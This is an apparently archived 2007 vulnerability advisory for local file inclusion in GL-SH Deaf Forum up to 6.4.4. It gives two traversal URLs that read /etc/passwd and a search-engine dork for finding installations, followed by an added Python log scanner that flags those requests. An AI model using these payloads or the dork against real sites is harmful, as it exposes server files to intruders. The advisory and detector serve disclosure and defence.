# Title : GL-SH Deaf Forum <= 6.4.4 Local File Inclusion Vulnerabilities
# Published : 2007-06-28
# Author : Katatafish
###GL-SH Deaf Board Version <= 6.4.4 local file inclusion###
#download: http://www.frank-karau.de/download/Deafforum_version_6.4.3.zip
#found by: Katatafish (karatatata@hush.com)
#google dork:"2005 www.frank-karau.de" | "2006 www.frank-karau.de"
#exploit:
http://www.site.com/[path]/functions.php?FORUM_LANGUAGE=../../../../../../../../../../../etc/passwd
http://www.site.com/[path]/bottom.php?style=../../../../../../.././etc/passwd%00
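A defender-side check for the two request patterns above, as an added example that is not part of the original advisory: it scans web-server access log lines for directory traversal sequences, absolute paths or NUL bytes in the `FORUM_LANGUAGE` parameter of `functions.php` and the `style` parameter of `bottom.php`. The combined log format, the `/forum/` path, the `german` value and all sample lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qsl, unquote

# Script -> parameter pairs named in the advisory.
WATCHED = {"functions.php": "FORUM_LANGUAGE", "bottom.php": "style"}
# Request line of a combined-format access log entry (log format is an assumption).
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

def decode_fully(value, rounds=3):
    """Percent-decode repeatedly so double-encoded input is also normalised."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def is_suspicious(value):
    """True if the value leaves the intended directory or carries a NUL byte."""
    v = decode_fully(value).replace("\\", "/")
    return "\x00" in v or v.startswith("/") or ".." in v.split("/")

def scan(lines):
    """Return (line_no, script, parameter, decoded_value) for every hit."""
    hits = []
    for n, line in enumerate(lines, 1):
        m = REQUEST_RE.search(line)
        if not m:
            continue
        url = urlsplit(m.group(1))
        script = url.path.rsplit("/", 1)[-1]
        param = WATCHED.get(script)
        # parse_qsl already percent-decodes once; decode_fully handles the rest.
        for key, raw in parse_qsl(url.query, keep_blank_values=True):
            if param and key == param and is_suspicious(raw):
                hits.append((n, script, param, decode_fully(raw)))
    return hits

# Constructed sample log lines (client addresses from the documentation range).
SAMPLE_LOG = [
    '192.0.2.10 - - [28/Jun/2007:10:00:01 +0000] "GET /forum/functions.php?FORUM_LANGUAGE=german HTTP/1.1" 200 512',
    '192.0.2.77 - - [28/Jun/2007:10:02:13 +0000] "GET /forum/functions.php?FORUM_LANGUAGE=../../../../etc/passwd HTTP/1.1" 200 1873',
    '192.0.2.77 - - [28/Jun/2007:10:02:20 +0000] "GET /forum/bottom.php?style=..%2F..%2F..%2Fetc%2Fpasswd%00 HTTP/1.1" 200 1873',
    '192.0.2.77 - - [28/Jun/2007:10:02:31 +0000] "GET /forum/bottom.php?style=%252e%252e%252fetc%252fpasswd HTTP/1.1" 200 90',
    '192.0.2.10 - - [28/Jun/2007:10:05:00 +0000] "GET /forum/index.php?style=../x HTTP/1.1" 404 0',
]

if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(hit)
```

Hits on these two parameters that return status 200 with an unusual response size are the entries to review first; the same `is_suspicious` test can serve as an input check in front of the affected scripts until they are patched or removed.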
# www.Syue.com [2007-06-28]